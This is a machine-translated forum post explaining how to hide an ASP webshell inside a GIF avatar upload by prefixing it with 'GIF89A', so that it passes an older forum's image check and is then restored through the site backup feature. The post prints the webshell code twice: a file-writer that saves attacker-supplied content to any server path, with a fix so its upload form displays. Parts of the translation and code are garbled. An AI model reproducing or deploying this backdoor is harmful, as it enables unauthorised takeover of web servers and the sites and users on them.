GIF89A combined with the network background (7.1 before) get a complete explanation of WebShell

xiaoxiao2021-03-05 23

background:

(1) Upload the online upload file, back up the back door

(2) Use GIF89A to upload the content as a Trojet GIF picture: Escape the detection of the avatar upload.

So a new method: upload a GIF avatar picture, back up to get the Trojan. (The range of use is: the previous version of the network 7.1)

But many people appear after the latter is a picture that cannot be displayed.

Even still announced the more convenient way I used the lucky way, and explain why this happens. :

It is the GIF89A plus standing assistant. When you run the back door, you will see the interface of the webmaster assistant. The only difference is a few words of the gif89a in the upper left corner. This method is used in a background (2) to test in a forum. . Ha ha

The GIF content is as follows:

----- The following is the GIF picture content (GIF89A below is the content of the webmaster assistant, no more reading) ----

GIF89A

'The content of the webmaster assistant ... omitted. . .

----- Or above the GIF picture content (GIF89A is the content of the webmaster assistant, don't read more) ----

In fact, the real problem is this:

Execute the ASP recovered by the GIF file, and finally display a picture that cannot be displayed:

In fact, this process has two:

(1) ASP explanation

(2) The display of your browser.

(1) is no problem.

The problem is now in your (2).

(2) The reason for the problem is the interpretation of the browser.

Workaround: Just put the displayed code between .

Originally this: The execution shows a picture that cannot be displayed.

GIF89A

<% DIM OBJFSO%>

<% DIM FDATA%>

<% DIM ObjcountFile%>

<% on error resume next%>

<% Set objfso = server.createObject ("scripting.filesystemObject")%>

<% IF Trim (Request ("SyfdPath")) <> "" "" "

<% fdata = request ("cyfddata")%>

<% Set objcountfile = objfso.createtextfile (Request ("SyfdPath"), TRUE)%>

<% objcountfile.write fdata%>

<% IF ERR = 0 THEN%>

<% response.write save success! %>

<% ELSE%>

<% response.write " save unsuccess! "%>

<% end if%>

<% err.clear%>

<% end if%>

<% ObjcountFile.close%>

<% Set objcountfile = Nothing%>

<% Set objfso = NOTHING%>

<% Response.write "

"%> <% response.write "saved absolute path (including file name: D: /web/x.asp "%>

<% Response.write "%>

<% Response.write "
"%>

<% Response.write "This file absolute path"%>

<% = server.mappath (Request.ServerVariables ("script_name"))%>

<% Response.write "
"%>

<% Response.write "Enter Ma's content:"%>

<% Response.write " </ textarea>"%></p> <p><% Response.write <input type = submit value = save> "%></p> <p><% Response.write "</ form>"%></p> <p>After the modification: It is normal. . The latter door is used normally. . Haha</p> <p>GIF89A</p> <p><body></p> <p><% DIM OBJFSO%></p> <p><% DIM FDATA%></p> <p><% DIM ObjcountFile%></p> <p><% on error resume next%></p> <p><% Set objfso = server.createObject ("scripting.filesystemObject")%></p> <p><% IF Trim (Request ("SyfdPath")) <> "" "" "</p> <p><% fdata = request ("cyfddata")%></p> <p><% Set objcountfile = objfso.createtextfile (Request ("SyfdPath"), TRUE)%></p> <p><% objcountfile.write fdata%></p> <p><% IF ERR = 0 THEN%></p> <p><% response.write <font color = red> save success! </ font>%></p> <p><% ELSE%></p> <p><% response.write "<font color = red> save unsuccess! </ font>"%></p> <p><% end if%></p> <p><% err.clear%></p> <p><% end if%></p> <p><% ObjcountFile.close%></p> <p><% Set objcountfile = Nothing%></p> <p><% Set objfso = not%> <% response.write "<form action = '' method = post>"%></p> <p><Font Color = Red> Save File <Font Color = Red> Absolute Path (including file name: D: /web/x.asp): </ font> "%></p> <p><% Response.write <input type = text name = syfdpath width = 32 size = 50> "%></p> <p><% Response.write "<br>"%></p> <p><% Response.write "This file absolute path"%></p> <p><% = server.mappath (Request.ServerVariables ("script_name"))%></p> <p><% Response.write "<br>"%></p> <p><% Response.write "Enter Ma's content:"%></p> <p><% Response.write "<textarea name = cyfddata cols = 80 rows = 10 width = 32> </ textarea>"%></p> <p><% Response.write <input type = submit value = save> "%></p> <p><% Response.write "</ form>"%></p> <p></ body></p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-36981.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="36981" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.094</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'dulYEUjnUPId4iPqFUyRCq8NTKy_2BjWpZriAZYN1hBAAX8MQGyk4r5pQ0ltavn2JMDCNxr4nH4og7zeDAGlixug_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>